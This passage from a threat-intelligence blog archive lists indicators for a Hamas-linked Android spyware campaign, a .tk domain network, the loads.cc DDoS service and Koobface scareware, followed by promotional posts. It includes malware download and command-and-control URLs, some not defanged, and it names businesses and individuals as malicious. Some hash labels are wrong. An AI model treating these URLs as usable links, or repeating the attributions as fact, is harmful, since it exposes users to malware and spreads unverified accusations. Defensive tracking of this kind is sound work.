hxxp://nuerweb.tk

hxxp://attrecentre.tk

hxxp://raiterbesoin.tk

hxxp://leresprit.tk

hxxp://ontenirforme.tk

hxxp://nirfonction.tk

hxxp://chergroupe.tk

hxxp://rtte.tk

hxxp://epied.tk

hxxp://erparis.tk





hxxp://liserpouvoir.tk

hxxp://rtagertype.tk

hxxp://reconnatrefemme.tk

Related malicious and fraudulent domains known to have responded to 37.230.116.105:

hxxp://lpoursuivretat.tk

hxxp://gycazyuge.tk

hxxp://optygyty.tk

hxxp://hurevente.tk

hxxp://kofojok.tk

hxxp://expliopjipn.tk

hxxp://nijiscy.tk

hxxp://mprendreauteur.tk

hxxp://vertravers.tk

hxxp://truirefrance.tk

hxxp://lokodasre.tk

hxxp://prendrecorps.tk

hxxp://iokoivefikolf.tk

hxxp://hudabertee.tk

hxxp://larereffet.tk

hxxp://husanuie.tk

hxxp://pocokie.tk

hxxp://gysazatre.tk
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hxxp://ssurercentre.tk

hxxp://iperuvre.tk

hxxp://ferfreau.tk

hxxp://poserscurit.tk

hxxp://jidytzae.tk

hxxp://jikogyda.tk

hxxp://tirsystme.tk

hxxp://thermesure.tk

hxxp://plaisijir.tk

hxxp://tyferet.tk

hxxp://irefrance.tk

hxxp://sedkorlor.tk

hxxp://serfille.tk

hxxp://ruiyrgion.tk

hxxp://permettretravers.tk

hxxp://lpouruiretat.tk

hxxp://fournirplupart.tk

hxxp://roposergenre.tk

hxxp://tircadre.tk

hxxp://reconnatrechef.tk

hxxp://oiril.tk

hxxp://enterguerre.tk

hxxp://irvaleur.tk

hxxp://irsocit.tk

hxxp://hugersoir.tk

hxxp://jokofasa.tk

hxxp://gyrecersa.tk

hxxp://ekotyfereen.tk

hxxp://kosazagerr.tk

hxxp://ioterexu.tk

hxxp://voirirguerre.tk

hxxp://stermain.tk

hxxp://kokofete.tk

hxxp://uiregy.tk

hxxp://lodokiv.tk

hxxp://nedfuheihg.tk

hxxp://koduhutr.tk

hxxp://husadere.tk

hxxp://gytedexen.tk

hxxp://jisazabyt.tk

hxxp://potycerer.tk

hxxp://lopotyre.tk

hxxp://huqerwerite.tk

hxxp://rtircouleur.tk

hxxp://tirhujmort.tk

hxxp://huderesen.tk

hxxp://expliqueren.tk

hxxp://uihytyf.tk

hxxp://ikiryve.tk

hxxp://jisazajic.tk
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hxxp://hudasarete.tk

hxxp://potijife.tk

hxxp://lsejikog.tk

hxxp://gytlsentirsite.tk

hxxp://tiosuivremillion.tk

hxxp://kojerconseil.tk

hxxp://okinterlien.tk

hxxp://tenterargent.tk

hxxp://eordre.tk

hxxp://onterami.tk

hxxp://vrirvente.tk

hxxp://nerbesoin.tk

hxxp://nertiko.tk

hxxp://geolorge.tk

hxxp://gyvercherdroit.tk

hxxp://bokosabe.tk

hxxp://lsjifferde.tk

hxxp://dyjursite.tk

hxxp://lopofibut.tk

hxxp://cevoirguerre.tk

hxxp://atteindreair.tk

hxxp://ardermillion.tk

hxxp://koiterplace.tk

hxxp://travaillersite.tk

hxxp://cuperquipe.tk

hxxp://ferdplaisir.tk

hxxp://lsentirsite.tk

hxxp://tsuivremillion.tk

hxxp://eciotersystme.tk

hxxp://ortercration.tk

hxxp://koeioijfgel.tk

hxxp://ituerexemple.tk

hxxp://olravaillersant.tk

hxxp://poloeioijfgel.tk

hxxp://pliquerformation.tk

hxxp://tsortirgouvernement.tk

hxxp://vkojrguerre.tk

hxxp://kijiirraison.tk

hxxp://ndreterme.tk

hxxp://iterplace.tk

hxxp://oposerprojet.tk

hxxp://ldclarerplace.tk

hxxp://permort.tk
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Related malicious and fraudulent domains known to have participated in the campaign (138.68.113.179;

172.64.196.39; 172.64.197.39; 104.27.170.199; 104.27.171.199):

hxxp://click.newsfeed.support

hxxp://soprano.newsfeed.support

hxxp://clarify.newsfeed.support

hxxp://theater.newsfeed.support

hxxp://impress.newsfeed.support

hxxp://urgency.newsfeed.support

hxxp://thinker.newsfeed.support

hxxp://glasses.newsfeed.support

hxxp://qualify.newsfeed.support

hxxp://warning.newsfeed.support

hxxp://scandal.newsfeed.support

hxxp://minimum.newsfeed.support

hxxp://general.newsfeed.support

hxxp://glimpse.newsfeed.support

hxxp://extreme.newsfeed.support

hxxp://officer.newsfeed.support

hxxp://silence.newsfeed.support

hxxp://capital.newsfeed.support

hxxp://voucher.newsfeed.support

hxxp://dentist.newsfeed.support

1.

https://www.flashpoint-intel.com/blog/after-action-report-flashpoint-remediation-of-0-day-exploit-on-our

-public-facing-website/

2. https://www.scmagazine.com/home/security-news/flashpoint-our-site-was-not-dishing-malware/

3.

https://www.anti-malware.name/news/expert-accused-intel-flashpoint-website-in-spread-of-malware-while-co

mpany-denies-accusations/

4. https://www.enterprisetimes.co.uk/2019/04/26/flashpoint-reacts-to-claim-website-served-malware/

5. https://news.rambler.ru/internet/42088442-sayt-flashpoint-rasprostranyaet-vredonos-flashpoint-net/

6. https://www.flashpoint-intel.com/
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Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas Online Infastructure

(2019-05-04 19:45)

Love them or hate them - the ubiquitous beautiful girl utilizing fake bogus and rogue Facebook accounts scam

campaign courtesy of Hamas targeting Israeli soldiers has to come to an end.

In this post I’ll provide actionable intelligence on a currently active Pro-Hamas malicious and fraudulent infras-

tructure and will discuss in-depth the tactics techniques and procedures of the cybercriminals behind it and will

offer in-depth perspective on a currently active Pro-Hamas hosting provider - " [1]Nepras for Media & IT" which is basically a legitimate front-end company currently involved in a variety of Pro-Hamas malicious and fraudulent

malware-serving and propaganda spreading online infrastructure provider directly related to yet another Pro-Hamas

franchise - " Modern Tech Corp".

Sample Facebook Profile Names involved in the campaign:

Elianna Amer

Aitai Yosef

Karen Cohen

Amit Cohen

Loren Ailan

Verena Sonner

Lina Kramer

Sample profile photos of Pro-Hamas fake and rogue Facebook accounts:
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Sample malicious and fraudulent URL known to have participated in the campaign:

hxxp://apkpkg.com/android/?product=yeecallpro - 50.63.202.43; 50.87.148.131; 50.63.202.56

Related malicious MD5s known to have participated in the campaign:

MD5: 8f1b709ae4fb41b32674ca8c41bfcbf7

MD5: 95a782bd8711ac14ad76b068767515d7

MD5: 5b2aac6372dea167c737b0036e1bd515

MD5: f6ffa064a492e91854d35e7f225b1313

MD5: b3e40659ae0a0852e2f6eb928d402d9d

MD5: 7a9503152b4c8c1ee80ac7daf5405a91

Related malicious and fraudulent domains known to have participated in the campaign:

hxxp://goldncup.com

hxxp://glancelove.com - 204.11.56.48;

198.54.117.1;

198.54.117.198;

198.54.117.200;

198.54.117.197;

192.64.118.163

hxxp://autoandroidup.website

hxxp://mobilestoreupdate.website

hxxp://updatemobapp.website

Related malicious IPs known to have participated in the campaign:

hxxp://107.175.144.26

hxxp://192.64.114.147
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Related malicious MD5s known to have participated in the campaign:

MD5: 4f9383ae4d0285aeb86e56797f3193f7

MD5: 95a782bd8711ac14ad76b068767515d7

MD5: b3e40659ae0a0852e2f6eb928d402d9d

MD5: f6ffa064a492e91854d35e7f225b1313

MD5: 8f1b709ae4fb41b32674ca8c41bfcbf7

MD5: 5b2aac6372dea167c737b0036e1bd515

MD5: 7a9503152b4c8c1ee80ac7daf5405a91

Related malicious and fraudulent phone-back C &C server IPs:

hxxp://endpointup.com/update/upfolder/updatefun.php

hxxp://droidback.com/pockemon/squirtle/functions.php

Related malicious and fraudulent domains known to have participated in the campaign:

hxxp://androidbak.com

hxxp://droidback.com

hxxp://endpointup.com

hxxp://siteanalysto.com

hxxp://goodydaddy.com

Related emails known to have participated in the campaign:

info@palgoal.ps

support@nepras.com

mtcg@mtcgaza.com

Related fraudulent and malicious domains known to have been registered using the same email - info@palgoal.ps:

hxxp://7qlp.com

hxxp://all-in1.net

hxxp://androidmobgate.com

hxxp://arabstonight.com

hxxp://collectrich.com

hxxp://krmalk.com

hxxp://motionsgraphic.com

hxxp://orchidcollege.com

hxxp://paltrainers.org

hxxp://rosomat.net

hxxp://stikerscloud.com

Related fraudulent and malicious domains known to have been registered using the same email - sup-

port@nepras.com:

hxxp://acchd.net

hxxp://ahlulquran.com

hxxp://alalbait.ps

hxxp://alnorhan.com

hxxp://alowini.com

hxxp://alresalah.news

hxxp://alshibl.com

hxxp://alwanbook.com

hxxp://arqamschools.com

hxxp://azarcnc.com
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hxxp://boxmarket.org

hxxp://bstcover.com

hxxp://caades.org

hxxp://detour-bs.com

hxxp://driverup2date.com

hxxp://drmazen.com

hxxp://drmazen.ps

hxxp://eta-water.com

hxxp://fares-alarab.com

hxxp://feker.net

hxxp://fekerjaded.net

hxxp://fekerjaded.com

hxxp://gaza-health.com

hxxp://gcstv.tv

hxxp://hairgenomics.com

hxxp://idco.center

hxxp://islamicbl.com

hxxp://khaledjuma.net

hxxp://kingtoys.ps

hxxp://learningoutcome.net

hxxp://lemaghi.com

hxxp://lsugaza.org

hxxp://mailsinfo.net

hxxp://majallaa.com

hxxp://manara.ps

hxxp://mobilyapp.com

hxxp://mtsc.tech

hxxp://nepras.net

hxxp://nepras.ps

hxxp://nsms.ps

hxxp://osamaalnajjar.com

hxxp://osratyorg.com

hxxp://panorama-pvs.com

hxxp://pay2earn.net

hxxp://pharmahome.net

hxxp://saqacc.com

hxxp://saudifame.com

hxxp://scc-online.net

hxxp://sondooq.net

hxxp://syada.org

hxxp://takafulsys.com

hxxp://taqat.work

hxxp://taqat.jobs

hxxp://technologylotus.com

hxxp://thoraya.net

hxxp://vgsat.com

hxxp://yabous.net

hxxp://yourav.net

Related domains registered using "Nepras for Media & IT" infrastructure:
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hxxp://googlemapsservice.com

hxxp://lipidgenomics.com

hxxp://akalgroup.net

hxxp://rami-kerenawi.com

hxxp://bestyleperfumes.com

hxxp://azarcnc.com

hxxp://go-2web.com

hxxp://jettafood.com

hxxp://mushtahatours.com

hxxp://pal4news.net

hxxp://pcr-shate.com

hxxp://saqacc.com

hxxp://shahidvideo.com

hxxp://shop8d.net

hxxp://spermgenomics.com

hxxp://tawjihips.com

hxxp://vidioarb.com

hxxp://yourav.net

hxxp://yourdialerpal.com

hxxp://freedombeacon.info

hxxp://neprastest.info

hxxp://nirmaali.com

hxxp://zaibaq-hearing.com

hxxp://bramgsoft.com

hxxp://hairgenomics.com

hxxp://dietgenomix.com

hxxp://arcadialanguages.com

hxxp://himoudco.com

hxxp://moltkaa.com

hxxp://toyoorjanna.com

hxxp://facebootshe.com

hxxp://facebootshe.net

hxxp://somoood.com

hxxp://alnorhan.com

hxxp://alwatantoday.net

hxxp://elianali.com

hxxp://sspal.net

hxxp://hi-galaxy.com

hxxp://youthn.net

hxxp://gmamalaysia.com

hxxp://cbspgaza.com

hxxp://madarikmedia.com

hxxp://website-testnew.com

hxxp://childworldsociety.com

hxxp://netmarketpal.net

hxxp://albwwaba.com

hxxp://saudib.info

hxxp://pwaha.com

hxxp://smilymedia.com

hxxp://ftyatalghad.com
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hxxp://coldymedia.com

hxxp://kh-alsendawy.com

hxxp://scoutsyalla.com

hxxp://almofker.com

hxxp://rawnaqmedia.net

hxxp://pro-stud.com

hxxp://shawa-plast.com

hxxp://eta-water.com

hxxp://host4tech.net

hxxp://fekerjaded.com

hxxp://audioodrivers.com

hxxp://trsanweb.com

hxxp://3almpro.com

hxxp://neprasweb.info

hxxp://thaqefnafsak.net

hxxp://newpal21.com

hxxp://ads4market.net

hxxp://qcpalestineforum.net

hxxp://alothmanx.com

hxxp://detourbs.com

hxxp://engash.com

hxxp://anafenyx.com

hxxp://dar-pal.com

hxxp://loyal-hands.com

hxxp://sahabacomplex.net

hxxp://logintest.info

hxxp://mapartnr.com

hxxp://hejazeceramics.com

hxxp://gazaapeal.com

hxxp://tawzzef.com

hxxp://gazaappeal.com

hxxp://oqpizza.com

hxxp://arqamschools.com

hxxp://nafhacenter.com

hxxp://halaalmasry.com

hxxp://q9polls.com

hxxp://q8-polls.com

hxxp://palalghadschool.com

hxxp://servesni.com

hxxp://rose2020.com

hxxp://km-pal.com

hxxp://cfpalestine.com

hxxp://ipad2me.com

hxxp://arabsdownload.com

hxxp://projectsinturkey.com

hxxp://newmassa.com

hxxp://charitysys.info

hxxp://nepraswebsite.com

hxxp://iquds.com

hxxp://yabous.net
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hxxp://appsapkandroid.us

hxxp://alltech4arab.com

hxxp://hadaf.info

hxxp://plmedgroup.com

hxxp://modhish.net

hxxp://mltaka.com

hxxp://ajelapp.com

hxxp://khmap.com

hxxp://cupsport.net

hxxp://arshdnytech.com

hxxp://gmaedu.net

hxxp://lemaghi.com

hxxp://creativityjob.com

hxxp://imes-group.net

hxxp://rawnaqmedia.com

hxxp://alwanbook.com

hxxp://fifafoot.com

hxxp://sportarabs.com

hxxp://el-qalam.com

hxxp://bawadirsoft.com

hxxp://palalghad-school.com

hxxp://mixedwork.com

hxxp://plmedgroup.com

hxxp://alowini.com

hxxp://detour-bs.com

hxxp://earningoutcome.net

hxxp://shahedcom.com

hxxp://sport-kora.com

hxxp://torathshop.com

hxxp://newsolararabian.com

hxxp://h3sk.com

hxxp://gh-gaza91.com

hxxp://watanps.com

hxxp://mobilyapp.com

hxxp://nfs-pal.com

hxxp://yousef123.com

hxxp://alhato.com

hxxp://alyawmpress.net

hxxp://technologylotus.com

hxxp://qavalues.com

hxxp://ask2play.net

hxxp://hamasld.com

hxxp://bhscfood.com

hxxp://nmanews.com

hxxp://ifcdoha4.com

hxxp://sparkpowerco.net

hxxp://archour.com

hxxp://nmanews.net

hxxp://academy-uk.net

hxxp://turkey-gate.com
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hxxp://learningoutcome.net

hxxp://smattrix.com

hxxp://eradaa.net

hxxp://paltoday.com

hxxp://sugar-salt.net

hxxp://boutiqobasket.com

hxxp://ethadalpadia.com

hxxp://fonoungallery.com

hxxp://fonoungallery.com

hxxp://smattrix.com

hxxp://gazawiit.com

hxxp://alfarisnt.com

hxxp://lama-film.net

Related domains registered using "Nepras for Media & IT" infrastructure:

hxxp://lovemagazineofficial.com

hxxp://masmo7.com

hxxp://mnwrna.com

hxxp://androidbak.com

hxxp://fastdroidmob.com

hxxp://treestower.com

hxxp://aymanjoda.com

hxxp://advflameco.com

hxxp://mahmoudzuaiter.com

hxxp://libyatoda.com

hxxp://mtcpal.com

hxxp://khfamilies.com

hxxp://ch2t0.com

hxxp://dwratcom.com

hxxp://faker4.com

hxxp://orubah.com

hxxp://orchidcollege.com

hxxp://yasser-arafat.com

hxxp://wf-hall.com

hxxp://maharaty.net

hxxp://addoja.net

hxxp://arb10.com

hxxp://ajel-news.com

hxxp://rosomat.net

hxxp://sahifty.net

hxxp://looktik.com

hxxp://pstent.com

hxxp://newsmagasine.com

hxxp://gazass.com

hxxp://dooownloads.com

hxxp://androidmobgate.com

hxxp://koora-fast.com

hxxp://fitlifee.com

hxxp://share-crowd.com
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Related domains registered using the "Modern Tech Corp" Pro-Hamas fraudulent and malicious infrastructure:

hxxp://atfalocom.com

hxxp://bopfile.com

hxxp://djadet.com

hxxp://ecsrs.com

hxxp://egp-gaza.com

hxxp://infoocean.net

hxxp://katakeety.com

hxxp://katakeety.net

hxxp://linefood.com

hxxp://mtcpal.net

hxxp://nawrastv.net

hxxp://shobbaik.com

hxxp://tashbik.biz

hxxp://tashbik.com

hxxp://vansac-english.com

hxxp://woodrom.com

hxxp://alfareeq.info

hxxp://tashbik.info

hxxp://cashbacksave.com

hxxp://nerab.com

hxxp://download4android.com

hxxp://altartosi.net

hxxp://fostanews.com

hxxp://silverdai.com

hxxp://selhelou.com

hxxp://albassam-co.com

hxxp://almanar-studio.com

hxxp://facekooora.com

hxxp://holylandcar.com

hxxp://qneibi.com

hxxp://shaheen-flower.com

hxxp://strong-k.com

hxxp://pioneerfoodco.com

hxxp://sinokrotex.com

hxxp://zawiaa.net

hxxp://amwwal.com

hxxp://abuamra.com

hxxp://madridista-arab.com

hxxp://donia-fm.com

hxxp://donia-fm.net

hxxp://lmasatfnya.com

hxxp://dolphinexpress1.com

hxxp://dolphinexpress1.info

hxxp://dolphinexpress1.net

hxxp://radiosurif.com

hxxp://sahaba-radio.com

hxxp://odmint.com

hxxp://ylapin.com
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hxxp://ylapin.net

hxxp://mypage-pro.com

hxxp://mohdsheikh.com

hxxp://altelbany.com

hxxp://dolphinariumtours.com

hxxp://artsofali.com

hxxp://menalmuheetlelkhaleej.com

hxxp://alghaidaa.com

hxxp://ajwad-marble.com

hxxp://istakbel.com

hxxp://istaqbel.com

hxxp://istaqbil.com

hxxp://istaqbl.com

hxxp://istqbl.com

hxxp://estakbel.com

hxxp://estaqbel.com

hxxp://estaqbil.com

hxxp://estaqbl.com

hxxp://estqbl.com

hxxp://massrefy.com

hxxp://massrify.com

hxxp://amwwaly.com

hxxp://amwwaly.info

hxxp://amwwaly.net

hxxp://nawrastv.com

hxxp://stepcrm.com

hxxp://imraish.com

hxxp://zawiaa.com

hxxp://3la-kefak.com

hxxp://bsaisofamily.com

hxxp://imraish.com

Related malicious MD5s known to have participated in the campaign:

MD5: 10f27d243adb082ce0f842c7a4a3784b01f7248e

MD5: b8237782486a26d5397b75eeea7354a777bff63a

MD5: 09c3af7b0a6957d5c7c80f67ab3b9cd8bef88813

MD5: 9b923303f580c999f0fdc25cad600dd3550fe4e0

MD5: 0b58c883efe44ff010f1703db00c9ff4645b59df

MD5: 0a5dc47b06de545d8236d70efee801ca573115e7

MD5: 782a0e5208c3d9e8942b928857a24183655e7470

MD5: 5f71a8a50964dae688404ce8b3fbd83d6e36e5cd

MD5: 03b404c8f4ead4aa3970b26eeeb268c594b1bb47

Related certificates known to have participated in the campaign:

10:EB:7D:03:2A:B9:15:32:8F:BF:68:37:C6:07:45:FB:DF:F1:87:A6

9E:52:71:F3:D2:1D:C3:22:28:CB:50:C7:33:05:E3:DE:01:EB:CB:03

44:52:E6:4C:97:4B:6D:6A:7C:40:AD:1E:E0:17:08:33:87:AA:09:09

67:43:9B:EE:39:81:F3:5E:10:33:C9:7A:D9:4F:3A:73:3B:B0:CF:0A

89:C8:E2:E3:4A:23:3C:A0:54:A0:4A:53:D6:56:C8:2D:4A:8D:80:56

B4:D5:0C:8B:73:CB:A9:06:8A:B3:F2:49:35:F8:58:FE:A2:3E:2E:3A
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Related malicious MD5s known to have participated in the campaign including C &C phone-back locations: MD5: 8f1b709ae4fb41b32674ca8c41bfcbf7 - once executed the sample phones back to the following malcious

domain - hxxp://jonalbertwebsite.000webhostapp.co m

MD5: 95a782bd8711ac14ad76b068767515d7 - once executed the sample phones back to the following malicious

domains - hxxp://107.175.144.26/apps/d/p/op.php -> hxxp://app-measurement.com/config/app/1:48705006578-

9:android:6a899b85b 4fafd55?app _instance _id=76d4b711c98c3632398d47cb8d5777a3 &platform=android &gmp

_version=11200

MD5: 5b2aac6372dea167c737b0036e1bd515

MD5: f6ffa064a492e91854d35e7f225b1313 - once executed the sample phones back to the followin malicious

domain - hxxp://192.64.114.147/apps/d/p/op.php

MD5: b3e40659ae0a0852e2f6eb928d402d9d

MD5: 7a9503152b4c8c1ee80ac7daf5405a91

Related malicious MD5s known to have participated in the campaign:

MD5: f1b709ae4fb41b32674ca8c41bfcbf7

MD5: 95a782bd8711ac14ad76b068767515d7

MD5: 5b2aac6372dea167c737b0036e1bd515

MD5: f6ffa064a492e91854d35e7f225b1313

MD5: b3e40659ae0a0852e2f6eb928d402d9d

MD5: 7a9503152b4c8c1ee80ac7daf5405a91

Related malicious URL known to have participated in the campaign:

hxxp://bit.ly/2M7E2Zg

1. https://www.terrorism-info.org.il/Data/articles/Art_20397/E_188_12_177323293.pdf
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Historical OSINT - Profiling the Loads.cc Enterprise (2019-05-04 22:27)

Remember [1]loads.cc? In this post I’ll provide actionable intelligence on the popular DDoS for hire service circa

2008 and offer in-depth perspective on the tactics utilized by the gang behind the service for the purpose of earning

fraudulent revenue in the process of monetizing access to malware-infected hosts.

Sample malicious and fraudulent infrastructure known to have participated in the campaign:

hxxp://loads.cc - hxxp://ns1.udnska.cn (72.21.52.99), interestingly, hxxp://sateliting.cn is the C &C for hxxp://loads.cc service.

Related malicious and fraudulent URLs known to have participated in the campaign:

hxxp://sateliting.cn/? &v=exp6 &lid=1033

hxxp://sateliting.cn/? &v=iron &lid=1033

hxxp://sateliting.cn/? &v=1810kj &lid=1033

hxxp://sateliting.cn/? &v=Loko &lid=1033

hxxp://sateliting.cn/? &v=mporlova &lid=1033

hxxp://satelit-ing.cn/? &v=mporlova &lid=1033

hxxp://sateliting.cn/? &v=gto &lid=1033

Related malicious IPs known to have responded to sateliting.cn:

hxxp://50.117.116.117

hxxp://216.172.154.34

hxxp://50.117.122.90

hxxp://205.164.24.45

hxxp://50.117.116.205

hxxp://50.117.116.204

hxxp://65.19.157.227

Related malicious MD5s known to have participated in the campaign:

MD5: eb0e25f2ac8f50590e3a00dcf766ef02

MD5: 48cf9b8b063715bb53e691da61601a73

MD5: 0b63dc08da40fcaf532847cfa5d9fc12

MD5: 0abaffe7d19c382d6dc94e40b27f199b

MD5: 0844b755c7e26c8051ab23369f720a4b

MD5: 2f3e270c37b48523e3e89ab76a012092

1. https://ddanchev.blogspot.com/2008/03/loadscc-ddos-for-hire-service.html
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Historical OSINT - Massive Scareware Serving Campaign Spotted in the Wild (2019-05-04 22:41)

With scareware continuing to proliferate I’ve recently intercepted a currently active malicious and fraudulent blackhat

SEO campaign successfully enticing thousands of users into interacting with the rogue and malicious software with

the scareware behind the campaign successfully modifying the HOSTS on the affected host potentially exposing the

user to a variety of fake search engines type of rogue and fraudulent and malicious activity.

In this post I’ll provide actionable intelligence on the infrastructure behind the campaign.

Sample malicious URL known to have participated in the campaign:

hxxp://guardsys-zone.com/?p=WKmimHVmaWyHjsbIo22EeXZe0KCfZlbVoKDb2YmHWJjOxaCbk

X1

%2Bal6orKWekJXIZWhimmVummWIo6THodjXoGJdpqmikpVuZ21uaHFtb1 %2FEkKE %3D

Sample malicious MD5 known to have participated in the campaign:

MD5: 665480a64d4f72a33120251c968e9c28

Once executed the sample modifies the HOSTS and redirects them to the following domains:

hxxp://google-reseach.com/gfeed/click.php?q= &p=1 - 66.36.243.201

hxxp://google-reseach.com/search.php? &aff=32210 &saff=0 &q=

Related malicious rogue and fraudulent URL known to have participated in the campaign:

hxxp://88.85.73.139/landing/

Sample rogue and fraudulent payment processed used in the campaign:

hxxp://safetyself.com/safereports/ - 88.85.73.139
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Historical OSINT - Yet Another Massive Scareware Serving Campaign Courtesy of the Koobface Gang

(2019-05-05 16:47)

It’s 2010 and I’ve recently intercepted a currently circulating malicious and fraudulent scareware-serving campaign

courtesy of the Koobface Gang this time successfully typosquatting my name within its command and control

infrastructure.

In this post I’ll provide actionable intelligence behind the campaign and will discuss in-depth the infrastruc-

ture behind it.

Sample malicious and fraudulent domains known to have participated in the campaign:

hxxp://qjcleaner.eu/hitin.php?affid=02979

Sample malicious MD5 known to have participated in the campaign:

MD5: 8df3e9c50bb4756f4434a9b7d6c23c8c

Once executed a sample malware phones back to:

hxxp://212.117.160.18/install.php?id=02979

which is basical ly our dear friends at AS44042 ROOT-AS root eSolutions

Parked at the same IP where [1]Crusade Affiliates continue serving a diverse set of fake security software are

also [2]more scareware domains.

It’s also worth pointing out that the Koobface gang has recently started typosquatting various domains using my

name. Koobface gang is [3]typosquatting my name for registering domains ([4]for instance Rancho Ranchev; Pancho Panchev etc.) including hxxp://mayernews.com - which is registered to Danchev Danch (1andruh.a1@gmail.com).

1. https://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html

2. https://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html

3. https://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

4. https://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html
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Historical OSINT - Yet Another Massive Scareware-Serving Campaign Courtesy of the Koobface Gang

(2019-05-05 17:19)

It’s 2010 and I’ve recently came across to yet another currently active scareware-serving campaign courtesy of the

Koobface gang this time successfully introducing a CAPTCHA-breaking module potentially improving the propagation

and distribution scale within major social networks.

In this post I’ll discuss the campaign and provide actionable intelligence on the infrastructure behind it.

Related malicious domains known to have participated in the campaign:

hxxp://goscandir.com/?uid=13301 - 91.212.107.103 - hosting courtesy of [1]AS29550 - EUROCONNEX-AS Blueconnex

Networks Ltd Formally Euroconnex Networks

hxxp://ebeoxuw.cn/?uid=13301

hxxp://ebiezoj.cn/22/?uid=13301

hxxp://goscanhand.com/?uid=13301

hxxp://byxzeq.cn/22/?uid=13301

Sample malicious MD5 known to have participated in the campaign:

MD5: 16575a1d40f745c2e39348c1727b8552

Once executed a sample malware phones back to:

hxxp://in5it.com/download/Ipack.jpg - the actual executable

Related malicious MD5 known to have participated in the campaign:

MD5: 1d5e3d78dd7efd8878075e5dbaa5c4fd

Related malicious MD5 known to have participated in the campaign:

MD5: 6262c0cb1459adc8f278136f3cff2777

It’s worth pointing out that prior to analyzing the campaign it appears that the Koobface gang has recently in-

troduced a CAPTCHA-breaking module which basically relies on the active outsourcing of the CAPTCHA-breaking

process potentially improving the Koobface spreading and propagation effectiveness.

Sample malicious URL known to have participated in the campaign:

http://peacockalleyantiques.com/.sys/?getexe=v2googlecheck.exe

Sample malicious MD5 known to have participated in the campaign:

MD5: cf9729bf3969df702767f3b9a131ec2c

Sample malicious URL known to have participated in the campaign:

http://peacockalleyantiques.com/.sys/?getexe=v2captcha.exe

Sample malicious MD5 known to have participated in the campaign:

MD5: f2d0dbf1b11c5c2ff7e5f4c655d5e43e

Once executed a sample phones back to the following C &C server IPs:

hxxp://capthcabreak.com/captcha/?a=get &i=0 &v=14 - 67.212.69.230

hxxp://captchastop.com/captcha/?a=get &i=1 &v=14 - 67.212.69.230

1. https://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html
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Offensive Warfare 2.0 - The Future of Cyber Warfare - Hacking and Cyber Security Community - Public

Registration Now Open! (2019-05-15 10:33)

Dear blog readers,

I wanted to let you know of my newly launched hacking and security community - [1]Offensive Warfare 2.0 -

The Future of Cyber Warfare - Hacking and Cyber Security Community - with public registration now open.

How you can help?

- Register today!

- Share this post with friends and colleagues.

- Approach me at dancho.danchev@hush.com with your comments feedback and general suggestions

Stay tuned!

1. https://offensive-warfare.com/
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Proprietary Threat Intelligence Reports Available On Demand - Request a Copy Today! (2019-05-28 20:46)

Dear blog readers - I wanted to let everyone know of two – currently in the works – proprietary Threat Intelligence

type of reports - that you and your organization can easily acquire on demand. The first report details in-depth

including tactics techniques and procedures including hundreds of IOCs (Indicators of Compromise) in terms of the

Pay-Per-Install Business Model circa 2008 - worth $1,500 and the second report which is also available on demand

details the inner workings of the CAPTCHA-Solving Underground Market Business Model - which is also worth $1,500.

Similar my most recently – now publicly available – report on " [1]Assessing The Computer Network Operation (CNO)

Capabilities of the Islamic Republic of Iran - Report" capabilities including a complimentary social network graph - the proprietary Threat Intelligence reports can be requested online - and the user including the organization will receive a

complimentary copy of the report - including a possible attribution vector - within 30 days prior to making a purchase.

How you can order a copy of the report?

Feel free to approach me at dancho.danchev@hush.com to inquire about making a purchase.

Stay tuned!

1. https://ddanchev.blogspot.com/2015/07/assessing-computer-network-operation_29.html

531





Proprietary Cybercrime and Dark Web Forum Search Engine - BETA Access Available! (2019-05-28 20:48)

Dear blog readers - I wanted to let everyone know of a currently active BETA project - namely - the general invite-

only proprietary access to a Cybercrime and Dark Web Underground Forum Search Engine - exclusively targeting

Security Vendors the U.S Intelligence Community and Law Enforcement including independent-vetted invite-only

subscription-based access to the World’s largest and near-real-time repository of Cybercrime Research Data - worth

$3,500 in the form of one-time payment - for the purpose of fueling growth into the project - and to request the

necessary access - including possible subscription-based agreement - further fueling growth into the project and the

quality of the inventory of data.

How to request access?

Feel free to approach me at dancho.danchev@hush.com with your inquiry in terms of this project.

Stay tuned!
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Dancho Danchev’s Blog - Public Comments Now Open! (2019-05-29 08:38)

Dear blog readers,

Ever since 2005 where I originally launched this blog - I decided to turn off public comments so that I can

present a decent portion of my Information Security knowledge to a diverse set of audiences. Back in the glorious

Web 2.0 years when I was busy doing business development and PR outreach for a variety of Security Projects I’ve

recently decided that the time has come to open public comments on one of the Security Industry’s most popular

personal blogs on Information Security Cybercrime Research and Threat Intelligence with the idea to reach out to

everyone reading this blog potentially building a high-quality comment and research feedback network of Security

Industry members U.S Intelligence Community members and the general public.

Looking forward to receiving your comments - and as always feel free to go through the archives to catch up

with what I’ve been up to.

Stay tuned!
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Dancho Danchev’s Blog - Audio Version Available - Listen to Every Post! (2019-05-30 16:15)

Dear blog readers,

I wanted to let everyone know that I’ve recently introduced an audio-listening functionality to every blog post

basically allowing you to listen to every blog post on this blog. What do you think?

Basically it allows you to easily plug and play your head-set and listen on current historical and upcoming

posts. Stay tuned for an updated set of features to be implemented anytime soon.

Consider going through the following high-profile Security Interviews which I managed to produce throughout

2003-2006 while working for [1]Astalavista Security Group.

- [2]Security Interviews 2004/2005 - Part 1
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- [3]Security Interviews 2004/2005 - Part 2

- [4]Security Interviews 2004/2005 - Part 3

including the following commentary and Open Letter to the U.S Intelligence Community:

- [5]The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Let-

ter to the U.S Intelligence Community

Enjoy and stay tuned!

1. https://packetstormsecurity.com/files/author/3007/

2. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-1.html

3. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-2.html

4. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-3.html

5. https://ddanchev.blogspot.com/2019/01/the-threat-intelligence-market-segment.html
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Upcoming Security Project - Accepting Donations and Feedback! (2019-05-30 17:11)

Dear blog readers I wanted to let everyone know that I’ve recently added a "Donate Today!" button including a

Pop-Up banner within my blog with the idea to [1]seek you donations and feedback to raise the necessary capital

for an upcoming Security Project.

How you can contribute in case you’re a long-time reader of this blog - and want to possibly see more high-

